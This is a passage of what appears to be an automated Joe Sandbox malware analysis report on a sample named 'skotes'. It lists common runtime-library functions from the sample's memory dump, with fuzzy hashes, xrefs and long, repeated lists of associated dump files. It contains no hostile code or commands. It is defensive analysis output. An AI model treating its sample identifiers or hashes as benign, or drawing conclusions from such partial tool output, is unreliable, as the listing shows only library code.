Part of subcall function 0049C6B2: _InternalDeleteHelper.LIBCONCRT ref: 0049C6C4

ListArray.LIBCONCRT ref: 0049D0E1
_InternalDeleteHelper.LIBCONCRT ref: 0049D0FA

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 1c71a17fd2b4e54ed84a6505318bfa56e42f7f8d775e01d98b3dd7f77e0d7ca6
Instruction ID: f4b962f63d178705ebbc3e813539b8c8b6503326d896209287bdc2c8ad4ba652
Opcode Fuzzy Hash: 1c71a17fd2b4e54ed84a6505318bfa56e42f7f8d775e01d98b3dd7f77e0d7ca6
Instruction Fuzzy Hash: 6301D632A01521AFCE25BB62D8C6D6EBF69BF44714700043FF80497652DF28AC5187A8

Function 004A33C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004A33DB
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004A33EF
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 004A3407
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004A341F

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 8ec7ed939cbf21ab39a7e3126b851ef8ce3da146f7882de07bde7e60d0c8ceb4
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: FD012B32600514A7CF16EE558841AEF77999F66314F10001BFC119B382EA75EE1193A4

Function 00499510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00499519

Part of subcall function 0048F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00495486

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0049953D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00499550
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00499559

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction ID: 508c7186007c34897d99dc159295af976b4da89a1705914035b98d6d12d9d99e
Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction Fuzzy Hash: 04F0A732200A206EEE72AB5D8811F6B27949F41729F01C42FE41B97242CE2CED46CB49

Function 004AF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 004AF3A3

Strings

8"M, xrefs: 004AF44B
`'M, xrefs: 004AF375

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"M$`'M
API String ID: 3903695350-1506308239
Opcode ID: 96a62c121d3872d5c8fadf9a7b44bd5afa29595452b39557429d2471f62e5f89
Instruction ID: b8dcbab755dbcc059bef28d85c36f09d39f7b03d99999b5d540f40501f1f4224
Opcode Fuzzy Hash: 96a62c121d3872d5c8fadf9a7b44bd5afa29595452b39557429d2471f62e5f89
Instruction Fuzzy Hash: F5318F31500201DFDB20AABAD945B5B73E6EF26316F10482FF485D7691DF78AC94CB19

Function 004AF1BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 004AF232
__freea.LIBCMT ref: 004AF298

Part of subcall function 004AB04B: RtlAllocateHeap.NTDLL(00000000,A02F68A0,?,?,0048D3FC,A02F68A0,?,00487A8B,?,?,?,?,?,?,00477465,?), ref: 004AB07E

Strings

ZJ,mJ, xrefs: 004AF1D2

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

